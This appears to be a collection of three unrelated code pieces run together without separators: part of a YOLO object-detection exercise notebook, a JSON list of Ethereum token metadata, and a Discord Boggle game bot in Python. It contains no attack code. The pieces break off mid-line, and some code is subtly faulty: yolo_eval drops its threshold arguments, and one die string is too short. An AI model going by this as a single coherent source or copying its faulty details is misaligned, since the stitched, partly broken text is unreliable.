### START CODE HERE ### (≈ 1 line)
nms_indices = tf.image.non_max_suppression(boxes, scores, max_boxes_tensor, iou_threshold)
### END CODE HERE ###
# Use K.gather() to select only nms_indices from scores, boxes and classes
### START CODE HERE ### (≈ 3 lines)
scores = K.gather(scores, nms_indices)
boxes = K.gather(boxes, nms_indices)
classes = K.gather(classes, nms_indices)
### END CODE HERE ###
return scores, boxes, classes
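tf.image.non_max_suppression can be mimicked by a short greedy pure-Python sketch (illustrative only, not TensorFlow's implementation): visit boxes in descending score order and keep a box only if it does not overlap an already-kept box beyond the IoU threshold.

```python
def greedy_nms(scores, boxes, max_boxes=10, iou_threshold=0.5):
    """Return the indices of the kept (x1, y1, x2, y2) boxes, best first."""
    def iou(a, b):
        inter = (max(min(a[2], b[2]) - max(a[0], b[0]), 0)
                 * max(min(a[3], b[3]) - max(a[1], b[1]), 0))
        area_a = (a[2] - a[0]) * (a[3] - a[1])
        area_b = (b[2] - b[0]) * (b[3] - b[1])
        return inter / (area_a + area_b - inter)

    keep = []
    for i in sorted(range(len(scores)), key=scores.__getitem__, reverse=True):
        if all(iou(boxes[i], boxes[j]) <= iou_threshold for j in keep):
            keep.append(i)
        if len(keep) == max_boxes:
            break
    return keep

kept = greedy_nms([0.9, 0.8, 0.7],
                  [(0, 0, 10, 10), (1, 1, 10, 10), (20, 20, 30, 30)])
```

The second box overlaps the first with IoU 81/100 = 0.81, so it is suppressed; the disjoint third box is kept.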
# In[23]:
with tf.Session() as test_b:
scores = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
boxes = tf.random_normal([54, 4], mean=1, stddev=4, seed = 1)
classes = tf.random_normal([54,], mean=1, stddev=4, seed = 1)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
print("scores[2] = " + str(scores[2].eval()))
print("boxes[2] = " + str(boxes[2].eval()))
print("classes[2] = " + str(classes[2].eval()))
print("scores.shape = " + str(scores.eval().shape))
print("boxes.shape = " + str(boxes.eval().shape))
print("classes.shape = " + str(classes.eval().shape))
# GRADED FUNCTION: yolo_eval
def yolo_eval(yolo_outputs, image_shape = (720., 1280.), max_boxes=10, score_threshold=.6, iou_threshold=.5):
"""
Converts the output of YOLO encoding (a lot of boxes) to your predicted boxes along with their scores, box coordinates and classes.
Arguments:
yolo_outputs -- output of the encoding model (for image_shape of (608, 608, 3)), contains 4 tensors:
box_confidence: tensor of shape (None, 19, 19, 5, 1)
box_xy: tensor of shape (None, 19, 19, 5, 2)
box_wh: tensor of shape (None, 19, 19, 5, 2)
box_class_probs: tensor of shape (None, 19, 19, 5, 80)
image_shape -- tensor of shape (2,) containing the input shape, in this notebook we use (720., 1280.) (has to be float32 dtype)
max_boxes -- integer, maximum number of predicted boxes you'd like
score_threshold -- real value, if [ highest class probability score < threshold], then get rid of the corresponding box
iou_threshold -- real value, "intersection over union" threshold used for NMS filtering
Returns:
scores -- tensor of shape (None, ), predicted score for each box
boxes -- tensor of shape (None, 4), predicted box coordinates
classes -- tensor of shape (None,), predicted class for each box
"""
### START CODE HERE ###
# Retrieve outputs of the YOLO model (≈1 line)
box_confidence, box_xy, box_wh, box_class_probs = yolo_outputs
# Convert boxes to be ready for filtering functions
boxes = yolo_boxes_to_corners(box_xy, box_wh)
# Use one of the functions you've implemented to perform Score-filtering with a threshold of score_threshold (≈1 line)
scores, boxes, classes = yolo_filter_boxes(box_confidence, boxes, box_class_probs, threshold=score_threshold)
# Scale boxes back to original image shape.
boxes = scale_boxes(boxes, image_shape)
# Use one of the functions you've implemented to perform Non-max suppression with a threshold of iou_threshold (≈1 line)
scores, boxes, classes = yolo_non_max_suppression(scores, boxes, classes)
### END CODE HERE ###
return scores, boxes, classes
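The corner conversion performed by yolo_boxes_to_corners before filtering can be sketched for a single box. This is a simplified (x_c, y_c, w, h) → (x1, y1, x2, y2) form; the yad2k helper additionally reorders the result to y-first coordinates.

```python
def to_corners(box_xy, box_wh):
    """Convert one box from (center, size) to corner coordinates."""
    (xc, yc), (w, h) = box_xy, box_wh
    return (xc - w / 2, yc - h / 2, xc + w / 2, yc + h / 2)

corners = to_corners((5.0, 5.0), (4.0, 2.0))
```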
# In[25]:
with tf.Session() as test_b:
yolo_outputs = (tf.random_normal([19, 19, 5, 1], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 2], mean=1, stddev=4, seed = 1),
tf.random_normal([19, 19, 5, 80], mean=1, stddev=4, seed | |
"youtube": ""
}
},
"XGG": {
"symbol": "XGG",
"address": "0xf6b6AA0Ef0f5Edc2C1c5d925477F97eAF66303e7",
"decimals": 8,
"name": "Going Gems",
"ens_address": "",
"website": "https://www.going-gems.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://www.going-gems.com/#blog",
"chat": "",
"facebook": "https://web.facebook.com/Going-Gems-307192689810299/",
"forum": "",
"github": "https://github.com/GoingGems",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://goinggemsholding.slack.com",
"telegram": "https://t.me/GoingGemsChannel",
"twitter": "https://twitter.com/GoingGems",
"youtube": ""
}
},
"CPT": {
"symbol": "CPT",
"name": "Contents Protocol Token",
"type": "ERC20",
"address": "0x9B62513c8a27290CF6A7A9e29386e600245EA819",
"ens_address": "",
"decimals": 18,
"website": "https://contentsprotocol.io",
"logo": {
"src": "https://contentsprotocol.io/icon_128x128.png",
"width": "128",
"height": "128",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@contents_prtcl",
"chat": "",
"facebook": "https://www.facebook.com/ContentsProtocol",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/contents-protocol",
"reddit": "",
"slack": "",
"telegram": "https://t.me/contents_protocol_en",
"twitter": "https://twitter.com/contents_prtcl",
"youtube": "https://www.youtube.com/channel/UCiRtJ81_UV-n3dghkF5fsmA"
}
},
"CMT": {
"symbol": "CMT",
"address": "0xf85fEea2FdD81d51177F6b8F35F0e6734Ce45F5F",
"decimals": 18,
"name": "<NAME>",
"ens_address": "",
"website": "https://cm.5miles.com",
"logo": {
"src": "http://res.5milesapp.com/image/upload/v1512116368/ico/cmt28.png",
"width": 28,
"height": 28,
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "http://www.cybermiles.io",
"chat": "",
"facebook": "https://www.facebook.com/cybermiles",
"forum": "",
"github": "https://github.com/CyberMiles",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/user/CyberMiles",
"slack": "https://slack.5miles.com",
"telegram": "https://t.me/cybermilestoken",
"twitter": "https://twitter.com/cybermiles",
"youtube": ""
}
},
"EPX": {
"symbol": "EPX",
"address": "0x35BAA72038F127f9f8C8f9B491049f64f377914d",
"decimals": 4,
"name": "ethPoker.io EPX",
"ens_address": "",
"website": "https://ethPoker.io",
"logo": {
"src": "https://ethpoker.io/wp-content/uploads/2018/03/smallBlueIcon.png",
"width": "51",
"height": "50",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": "https://ethPoker.io"
},
"social": {
"blog": "https://ethpoker.io/",
"chat": "",
"facebook": "",
"forum": "",
"github": "https://github.com/EthPokerIO/ethpokerIO",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/in/ethpoker/",
"reddit": "",
"slack": "",
"telegram": "https://t.me/EthPokerIOpresale",
"twitter": "https://twitter.com/ethpoker",
"youtube": ""
}
},
"SPF": {
"symbol": "SPF",
"address": "0x85089389C14Bd9c77FC2b8F0c3d1dC3363Bf06Ef",
"decimals": 18,
"name": "Sportify",
"ens_address": "",
"website": "https://sportyfi.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/sportyfi_io",
"youtube": ""
}
},
"sUSD": {
"symbol": "sUSD",
"name": "USD Synth (sUSD)",
"type": "ERC20",
"address": "0x57Ab1E02fEE23774580C119740129eAC7081e9D3",
"ens_address": "",
"decimals": 18,
"website": "https://www.synthetix.io",
"logo": {
"src": "https://www.synthetix.io/img/sUSD_blue_sml.png",
"width": "32",
"height": "32",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://blog.havven.io",
"chat": "https://discordapp.com/invite/AEdUHzt",
"facebook": "",
"forum": "",
"github": "https://github.com/havven/",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/synthetix/",
"reddit": "https://www.reddit.com/r/synthetix_io/",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/synthetix_io",
"youtube": ""
}
},
"SGR": {
"symbol": "SGR",
"name": "Sugar Exchange",
"type": "ERC20",
"address": "0xCB5A05beF3257613E984C17DbcF039952B6d883F",
"ens_address": "",
"decimals": 8,
"website": "http://sugarexchange.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/Sugar_Exchange",
"youtube": ""
}
},
"SPN": {
"symbol": "SPN",
"address": "0x20F7A3DdF244dc9299975b4Da1C39F8D5D75f05A",
"decimals": 6,
"name": "Sapien",
"ens_address": "",
"website": "https://www.sapien.network/",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://t.me/SapienNetwork",
"twitter": "",
"youtube": ""
}
},
"MESH": {
"symbol": "MESH",
"address": "0x01F2AcF2914860331C1Cb1a9AcecDa7475e06Af8",
"decimals": 18,
"name": "Meshbox",
"ens_address": "",
"website": "https://meshbox.network",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "https://www.facebook.com/MeshBoxFoundation/",
"forum": "",
"github": "https://github.com/MeshBox",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/meshbox/",
"reddit": "",
"slack": "",
"telegram": "t.me/MeshBoxEN",
"twitter": "https://twitter.com/Mesh_Box",
"youtube": "https://www.youtube.com/channel/UCQHwUo9rRidByL9vMlv0vSQ"
}
},
"NOX": {
"symbol": "NOX",
"address": "0xeC46f8207D766012454c408De210BCBc2243E71c",
"decimals": 18,
"name": "Nitro",
"ens_address": "",
"website": "https://nitro.live",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@NitroToken",
"chat": "",
"facebook": "https://www.facebook.com/NitroToken",
"forum": "https://bitcointalk.org/index.php?topic=2254986.0",
"github": "https://github.com/nitrotoken/nitro-crowdsale",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/nitrotoken",
"slack": "",
"telegram": "https://t.me/NitroToken_NOX",
"twitter": "https://twitter.com/nitrotoken",
"youtube": ""
}
},
"PRO": {
"symbol": "PRO",
"address": "0x226bb599a12C826476e3A771454697EA52E9E220",
"decimals": 8,
"name": "Propy",
"ens_address": "",
"website": "https://propy.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@propy",
"chat": "",
"facebook": "https://www.facebook.com/propyinc",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "https://www.linkedin.com/company/propy-inc-",
"reddit": "",
"slack": "https://propy.slack.com",
"telegram": "https://t.me/propy",
"twitter": "https://twitter.com/propyinc",
"youtube": ""
}
},
"HBZ": {
"symbol": "HBZ",
"name": "HBZ coin",
"type": "ERC20",
"address": "0xE34e1944E776f39B9252790a0527eBDa647aE668",
"ens_address": "",
"decimals": 18,
"website": "https://www.hbzcoin.com/#",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "https://medium.com/@HBZCoinOfficial",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/HelbizOfficial",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/HbZcoin",
"youtube": ""
}
},
"DIVX": {
"symbol": "DIVX",
"address": "0x13f11C9905A08ca76e3e853bE63D4f0944326C72",
"decimals": 18,
"name": "DIVX",
"ens_address": "",
"website": "https://www.diviproject.org",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "https://discord.gg/KQdVYsF",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/DiviProject",
"slack": "",
"telegram": "https://t.me/joinchat/EAdiTQ3yZk_GkqU0IdG-Gg",
"twitter": "",
"youtube": ""
}
},
"CAT (BitClave)": {
"symbol": "CAT (BitClave)",
"address": "0x1234567461d3f8Db7496581774Bd869C83D51c93",
"decimals": 18,
"name": "BitClave",
"ens_address": "",
"website": "https://www.bitclave.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://weibo.com/bitclave",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://slack.bitclave.com",
"telegram": "",
"twitter": "https://twitter.com/bitclave",
"youtube": ""
}
},
"EDO": {
"symbol": "EDO",
"address": "0xCeD4E93198734dDaFf8492d525Bd258D49eb388E",
"decimals": 18,
"name": "Eidoo",
"ens_address": "",
"website": "https://eidoo.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/eidoo",
"chat": "",
"facebook": "https://www.facebook.com/eidoocrypto",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://t.me/joinchat/AAAAAERSsZk99wFzx2v_Kw",
"twitter": "https://twitter.com/eidoo_io",
"youtube": ""
}
},
"A18": {
"symbol": "A18",
"name": "Apollo18",
"type": "ERC20",
"address": "0xBa7DCBa2Ade319Bc772DB4df75A76BA00dFb31b0",
"ens_address": "",
"decimals": 0,
"website": "https://apollo18.co.in",
"logo": {
"src": "https://apollo18.co.in/wp-content/uploads/2018/08/a18-28x28.png",
"width": "28",
"height": "28",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "https://medium.com/@apollo18",
"chat": "",
"facebook": "https://facebook.apollo18.co.in",
"forum": "",
"github": "https://github.com/apollo18crypto",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "",
"telegram": "https://telegram.apollo18.co.in",
"twitter": "https://twitter.apollo18.co.in",
"youtube": "http://youtube.apollo18.co.in"
}
},
"ONL": {
"symbol": "ONL",
"name": "On.Live",
"type": "ERC20",
"address": "0x6863bE0e7CF7ce860A574760e9020D519a8bDC47",
"ens_address": "",
"decimals": 18,
"website": "https://on.live",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/onlivetv",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/on_live",
"youtube": ""
}
},
"NTK": {
"symbol": "NTK",
"name": "Neurotoken",
"type": "ERC20",
"address": "0x69BEaB403438253f13b6e92Db91F7FB849258263",
"ens_address": "",
"decimals": 18,
"website": "https://neuromation.io",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/Neuromation",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/neuromation_io",
"youtube": ""
}
},
"KNC": {
"symbol": "KNC",
"address": "0xdd974D5C2e2928deA5F71b9825b8b646686BD200",
"decimals": 18,
"name": "<NAME>",
"ens_address": "",
"website": "https://kyber.network",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "<EMAIL>",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "https://github.com/KyberNetwork",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "",
"slack": "https://kybernetwork.slack.com",
"telegram": "",
"twitter": "https://twitter.com/KyberNetwork",
"youtube": ""
}
},
"DRT": {
"symbol": "DRT",
"name": "DomRaider",
"type": "ERC20",
"address": "0x9AF4f26941677C706cfEcf6D3379FF01bB85D5Ab",
"ens_address": "",
"decimals": 8,
"website": "https://token.domraider.com",
"logo": {
"src": "",
"width": "",
"height": "",
"ipfs_hash": ""
},
"support": {
"email": "",
"url": ""
},
"social": {
"blog": "",
"chat": "",
"facebook": "",
"forum": "",
"github": "",
"gitter": "",
"instagram": "",
"linkedin": "",
"reddit": "https://www.reddit.com/r/DomRaider",
"slack": "",
"telegram": "",
"twitter": "https://twitter.com/domraider",
"youtube": ""
}
},
"DST": {
"symbol": "DST",
"name": "Dimensions Strike Token",
"type": "ERC20",
| |
from __future__ import annotations
import asyncio
import random
from functools import wraps
from string import ascii_uppercase
from collections import defaultdict
from collections.abc import Iterable
from typing import NamedTuple, Optional
import discord
from discord.ext import commands, menus
from ditto import BotBase, Context
from ditto.types import User
from ditto.utils.strings import ordinal
SMALL = 3
ORIGINAL = 4
BIG = 5
SUPER_BIG = 6
# Digraph Emoji
AN_EMOJI = "<:_:808942978658861116>"
ER_EMOJI = "<:_:808944481382563870>"
HE_EMOJI = "<:_:808944480525746176>"
IN_EMOJI = "<:_:808942977464270849>"
QU_EMOJI = "<:_:806844322346565662>"
TH_EMOJI = "<:_:808944481264730112>"
REGIONAL_INDICATOR_EMOJI = (
"\N{REGIONAL INDICATOR SYMBOL LETTER A}",
"\N{REGIONAL INDICATOR SYMBOL LETTER B}",
"\N{REGIONAL INDICATOR SYMBOL LETTER C}",
"\N{REGIONAL INDICATOR SYMBOL LETTER D}",
"\N{REGIONAL INDICATOR SYMBOL LETTER E}",
"\N{REGIONAL INDICATOR SYMBOL LETTER F}",
"\N{REGIONAL INDICATOR SYMBOL LETTER G}",
"\N{REGIONAL INDICATOR SYMBOL LETTER H}",
"\N{REGIONAL INDICATOR SYMBOL LETTER I}",
"\N{REGIONAL INDICATOR SYMBOL LETTER J}",
"\N{REGIONAL INDICATOR SYMBOL LETTER K}",
"\N{REGIONAL INDICATOR SYMBOL LETTER L}",
"\N{REGIONAL INDICATOR SYMBOL LETTER M}",
"\N{REGIONAL INDICATOR SYMBOL LETTER N}",
"\N{REGIONAL INDICATOR SYMBOL LETTER O}",
"\N{REGIONAL INDICATOR SYMBOL LETTER P}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Q}",
"\N{REGIONAL INDICATOR SYMBOL LETTER R}",
"\N{REGIONAL INDICATOR SYMBOL LETTER S}",
"\N{REGIONAL INDICATOR SYMBOL LETTER T}",
"\N{REGIONAL INDICATOR SYMBOL LETTER U}",
"\N{REGIONAL INDICATOR SYMBOL LETTER V}",
"\N{REGIONAL INDICATOR SYMBOL LETTER W}",
"\N{REGIONAL INDICATOR SYMBOL LETTER X}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Y}",
"\N{REGIONAL INDICATOR SYMBOL LETTER Z}",
)
DIAGRAPHS = {"1": "AN", "2": "ER", "3": "HE", "4": "IN", "5": "QU", "6": "TH"}
LETTERS_EMOJI = {
"#": "\N{BLACK SQUARE FOR STOP}\ufe0f",
"1": AN_EMOJI,
"2": ER_EMOJI,
"3": HE_EMOJI,
"4": IN_EMOJI,
"5": QU_EMOJI,
"6": TH_EMOJI,
} | {letter: emoji for letter, emoji in zip(ascii_uppercase, REGIONAL_INDICATOR_EMOJI)}
# fmt: off
DIE = {
SMALL: [
"ATSWKA", "ZHIWIR", "WYASAY",
"NELTDL", "UJNIIQ", "ORQPII",
"PCOAUB", "TKRTAU", "ZAQLPG",
],
ORIGINAL: [
"RIFOBX", "IFEHEY", "DENOWS", "UTOKND",
"HMSRAO", "LUPETS", "ACITOA", "YLGKUE",
"5BMJOA", "EHISPN", "VETIGN", "BALIYT",
"EZAVND", "RALESC", "UWILRG", "PACEMD",
],
BIG: [
"5BZJXK", "TOUOTO", "OVWGR", "AAAFSR", "AUMEEG",
"HHLRDO", "MJDTHO", "LHNROD", "AFAISR", "YIFASR",
"TELPCI", "SSNSEU", "RIYPRH", "DORDLN", "CCWNST",
"TTOTEM", "SCTIEP", "EANDNN", "MNNEAG", "UOTOWN",
"AEAEEE", "YIFPSR", "EEEEMA", "ITITIE", "ETILIC",
],
SUPER_BIG: [
"AAAFRS", "AAEEEE", "AAEEOO", "AAFIRS", "ABDEIO", "ADENNN",
"AEEEEM", "AEEGMU", "AEGMNN", "AEILMN", "AEINOU", "AFIRSY",
"123456", "BBJKXZ", "CCENST", "CDDLNN", "CEIITT", "CEIPST",
"CFGNUY", "DDHNOT", "DHHLOR", "DHHNOW", "DHLNOR", "EHILRS",
"EIILST", "EILPST", "EIO###", "EMTTTO", "ENSSSU", "GORRVW",
"HIRSTV", "HOPRST", "IPRSYY", "JK5WXZ", "NOOTUW", "OOOTTU",
],
}
# fmt: on
with open("res/boggle.txt") as f:
DICTIONARY = set(f.read().splitlines())
POINTS = {
3: 1,
4: 1,
5: 2,
6: 3,
7: 5,
} | {x: 11 for x in range(8, SUPER_BIG ** 2)}
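`POINTS` above maps word length to score, with the dict-union `|` operator (Python 3.9+) extending the literal table so every length from 8 up to the longest word a 6x6 board could hold scores the maximum of 11. A standalone sketch of the same rule:

```python
# Standalone sketch of the scoring table defined above: 3-4 letter words
# score 1 point, then 2/3/5 points, and 8+ letters score the max of 11.
SUPER_BIG = 6  # edge length of the largest board

POINTS = {3: 1, 4: 1, 5: 2, 6: 3, 7: 5} | {n: 11 for n in range(8, SUPER_BIG ** 2)}

def score(word: str) -> int:
    """Score a word by length; anything under 3 letters is worth nothing."""
    return POINTS.get(len(word), 0)
```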
class Position(NamedTuple):
col: int
row: int
class Board:
def __init__(self, *, size=ORIGINAL, board=None):
self.size = size
if board is None:
board = DIE[self.size].copy()
random.shuffle(board)
board = [
[random.choice(board[row * self.size + column]) for column in range(self.size)]
for row in range(self.size)
]
self.columns = board
def board_contains(self, word: str, pos: Optional[Position] = None, passed: tuple[Position, ...] = ()) -> bool:
# Empty words
if len(word) == 0:
return True
# When starting out
if pos is None:
# Check all positions
for col in range(self.size):
for row in range(self.size):
if self.board_contains(word, Position(col, row)):
return True
# Checking new squares
elif pos not in passed:
# Check if letter matches current start of word
letter = self.columns[pos.col][pos.row]
if letter.isdigit():
letter = DIAGRAPHS[letter]
if word[: len(letter)] == letter:
# Check adjacent for next letter
for x in range(-1, 2):
for y in range(-1, 2):
# don't check yourself
if x == 0 and y == 0:
continue
new_pos = Position(pos.col + x, pos.row + y)
# don't check out of bounds
if new_pos.col < 0 or new_pos.col >= self.size or new_pos.row < 0 or new_pos.row >= self.size:
continue
if self.board_contains(word[len(letter) :], new_pos, [*passed, pos]):
return True
# Otherwise cannot find word
return False
# @cached_property
# def legal_words(self) -> set[str]:
# return {word for word in DICTIONARY if self.is_legal(word)}
def is_legal(self, word: str) -> bool:
if len(word) < 3:
return False
word = word.upper()
if word not in DICTIONARY:
return False
return self.board_contains(word)
def points(self, word: str) -> int:
return POINTS[len(word)] if self.is_legal(word) else 0
def total_points(self, words: Iterable[str]) -> int:
return sum(self.points(word) for word in words)
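`Board.board_contains` above is a recursive depth-first search: match the leading letter (or digraph), then try all eight neighbours, never revisiting a cell on the current path. A self-contained sketch of the same idea on a plain list-of-lists grid (the `grid_contains` name and single-character cells are illustrative, not the bot's API):

```python
from __future__ import annotations

def grid_contains(grid: list[list[str]], word: str) -> bool:
    """Depth-first search over 8-connected neighbours, never reusing a
    cell within one path -- the same idea as Board.board_contains above."""
    size = len(grid)

    def search(rest: str, col: int, row: int, visited: frozenset) -> bool:
        if not rest:                      # every letter matched
            return True
        if (col, row) in visited:         # cell already used on this path
            return False
        if not (0 <= col < size and 0 <= row < size):
            return False
        if grid[col][row] != rest[0]:
            return False
        return any(
            search(rest[1:], col + dc, row + dr, visited | {(col, row)})
            for dc in (-1, 0, 1)
            for dr in (-1, 0, 1)
            if (dc, dr) != (0, 0)
        )

    return any(
        search(word, col, row, frozenset())
        for col in range(size)
        for row in range(size)
    )
```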
class Game(menus.Menu):
name: Optional[str] = "Boggle"
footer: Optional[str] = None
def __init__(self, *, size=ORIGINAL, **kwargs):
self.board = Board(size=size)
self.setup()
super().__init__(**kwargs)
@property
def state(self):
state = ""
for row in range(self.board.size):
emoji = []
for column in range(self.board.size):
emoji.append(LETTERS_EMOJI[self.board.columns[column][row]])
state = " ".join(emoji) + "\n" + state
return discord.Embed(title=self.name, description=state).set_footer(text=self.footer)
def setup(self):
raise NotImplementedError
async def send_initial_message(self, ctx, channel):
return await channel.send(content="Boggle game started, you have 3 minutes!", embed=self.state)
async def start(self, *args, **kwargs):
await super().start(*args, **kwargs)
# await self.bot.loop.run_in_executor(None, lambda: self.board.legal_words)
async def finalize(self, timed_out):
self.bot.dispatch("boggle_game_complete", self.message.channel)
def get_points(self, words: Iterable[str]) -> int:
return self.board.total_points(words)
def check_word(self, word: str) -> bool:
return self.board.is_legal(word)
async def check_message(self, message: discord.Message):
raise NotImplementedError
@menus.button("\N{BLACK SQUARE FOR STOP}\ufe0f", position=menus.Last(0))
async def cancel(self, payload):
await self.message.edit(content="Game Cancelled.")
self.stop()
class ShuffflingGame(Game):
def __init__(self, *, size=ORIGINAL, **kwargs):
super().__init__(size=size, **kwargs)
self.boards = [self.board]
def shuffle(self):
raise NotImplementedError
async def shuffle_task(self):
for i in range(5):
await asyncio.sleep(30)
if not self._running:
return
# Shuffle board
self.shuffle()
self.boards.append(self.board)
# Note Board Updated
await self.message.channel.send("Board Updated!")
# Update Board Message
time = [
"2 minutes, 30 seconds",
"2 minutes",
"1 minute, 30 seconds",
"1 minute",
"30 seconds",
][i]
await self.message.edit(content=f"Board Updated! You have {time} left!", embed=self.state)
async def start(self, *args, **kwargs):
await super().start(*args, **kwargs)
self.bot.loop.create_task(self.shuffle_task())
def get_points(self, words: Iterable[str]) -> int:
points = 0
for word in words:
for board in self.boards:
pts = board.points(word)
if pts:
points += pts
break
return points
class DiscordGame(Game):
name = "Discord Boggle"
footer = "First to find a word wins points!"
@property
def scores(self):
embed = discord.Embed()
i = 0
old = None
for user, words in sorted(self.words.items(), key=lambda v: self.get_points(v[1]), reverse=True):
points = self.get_points(words)
if points != old:
old = points
i += 1
embed.add_field(
name=f"{ordinal(i)}: {user}",
value=f"**{len(words)}** words, **{points}** points.",
inline=False,
)
return embed
def setup(self):
self.all_words: set[str] = set()
self.words: dict[User, set[str]] = defaultdict(set)
async def check_message(self, message: discord.Message):
word = message.content
if word is None:
return
if not word.isalpha():
return
word = word.upper()
if not self.check_word(word):
return
if word in self.all_words:
return
# Add to user words
self.all_words.add(word)
self.words[message.author].add(word)
await message.add_reaction("\N{WHITE HEAVY CHECK MARK}")
async def finalize(self, timed_out: bool):
await super().finalize(timed_out)
if timed_out:
await self.message.edit(content="Game Over!")
await self.message.reply(embed=self.scores)
class ClassicGame(Game):
name = "Classic Boggle"
footer = "Keep a list of words til the end!"
@property
def scores(self):
embed = discord.Embed()
i = 0
old = None
for user, unique in sorted(
self.unique_words.items(),
key=lambda v: self.board.total_points(v[1]),
reverse=True,
):
words = self.words[user]
points = self.board.total_points(unique)
if points != old:
old = points
i += 1
embed.add_field(
name=f"{ordinal(i)}: {user}",
value=f"**{len(words)}** words, **{len(unique)}** unique, **{points}** points.",
inline=False,
)
return embed
def filter_lists(self):
for user, word_list in self.word_lists.items():
for word in word_list.split():
word = word.strip().upper()
if not word.isalpha():
continue
if not self.check_word(word):
continue
self.words[user].add(word)
# Remove from all sets if not unique
if word in self.used_words:
for unique_set in self.unique_words.values():
unique_set.discard(word)
continue
self.used_words.add(word)
self.unique_words[user].add(word)
async def check_message(self, message: discord.Message):
if message.author == self.bot.user:
return
if not self.over:
return
if message.content is None:
return
if message.author in self.word_lists:
return
self.word_lists[message.author] = message.content
await message.add_reaction("\N{WHITE HEAVY CHECK MARK}")
def setup(self):
self.over = False
self.used_words: set[str] = set()
self.word_lists: dict[User, str] = dict()
self.words: dict[User, set[str]] = defaultdict(set)
self.unique_words: dict[User, set[str]] = defaultdict(set)
async def finalize(self, timed_out: bool):
await super().finalize(timed_out)
if timed_out:
await self.message.edit(content="Game Over!")
await self.message.reply("Game Over! you have 10 seconds to send in your words.")
self.over = True
